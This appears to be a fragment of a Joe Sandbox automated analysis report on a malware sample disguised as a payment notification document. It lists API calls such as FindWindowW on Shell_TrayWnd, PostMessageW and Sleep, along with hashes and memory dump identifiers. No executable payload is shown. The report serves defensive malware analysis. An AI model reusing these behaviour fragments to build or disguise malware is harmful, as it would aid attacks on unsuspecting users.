                                                                              • Opcode Fuzzy Hash: 17cffa6fdd60d89bbf8bebee0ecac0d541e2b51d8caec1a9c262886decccb497
                                                                              • Instruction Fuzzy Hash: 1DD012A280A10CE9CB9096E0EC558BBB37CFB48301F608852FA26D1041DA38D548AF62
                                                                              APIs
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0097232C
                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0097233F
                                                                                • Part of subcall function 0094E97B: Sleep.KERNEL32 ref: 0094E9F3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: FindMessagePostSleepWindow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 529655941-2988720461
                                                                              • Opcode ID: 05bf0da8f85663fe560257162064e764dce01116eb04f4b8d39b595b3b8f854b
                                                                              • Instruction ID: be4a1eaddaf32935ac970b04a8f08abf6083f6c34c9bddb4a49a0682c0bc37fb
                                                                              • Opcode Fuzzy Hash: 05bf0da8f85663fe560257162064e764dce01116eb04f4b8d39b595b3b8f854b
                                                                              • Instruction Fuzzy Hash: 92D012773A8310B7E764B770DC4FFC67A14AB40B14F01491EB749AA1D0C9F0A841DA54
                                                                              APIs
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0097236C
                                                                              • PostMessageW.USER32(00000000), ref: 00972373
                                                                                • Part of subcall function 0094E97B: Sleep.KERNEL32 ref: 0094E9F3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: FindMessagePostSleepWindow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 529655941-2988720461
                                                                              • Opcode ID: 73f0eb1977737fef25cf414e527aa804aeb7b88ade791e146501fbd6ca3554d9
                                                                              • Instruction ID: 54f39d3020dc268e137434a00d948b016fd43724d59caa25d004a7240a7281f0
                                                                              • Opcode Fuzzy Hash: 73f0eb1977737fef25cf414e527aa804aeb7b88ade791e146501fbd6ca3554d9
                                                                              • Instruction Fuzzy Hash: 47D0C9723A9310BAE664A7709C4FFC66614AB45B14F01491AB649AA1D0C9A0A8419A58
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0091BE93
                                                                              • GetLastError.KERNEL32 ref: 0091BEA1
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0091BEFC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1717984340-0
                                                                              • Opcode ID: ead8985164ff2191af7a55e9adfdc4fd351efc3553aca857bbd38c11a1c04648
                                                                              • Instruction ID: b4e0f1f721fed9c94975dd1900cd8bf655570e44c4ecf94c663e49ed0cee0fdf
                                                                              • Opcode Fuzzy Hash: ead8985164ff2191af7a55e9adfdc4fd351efc3553aca857bbd38c11a1c04648
                                                                              • Instruction Fuzzy Hash: 2C41EA3570420AAFCF21AF65CC54BFA7BAAEF41720F144169F959972E1DB308D82DB90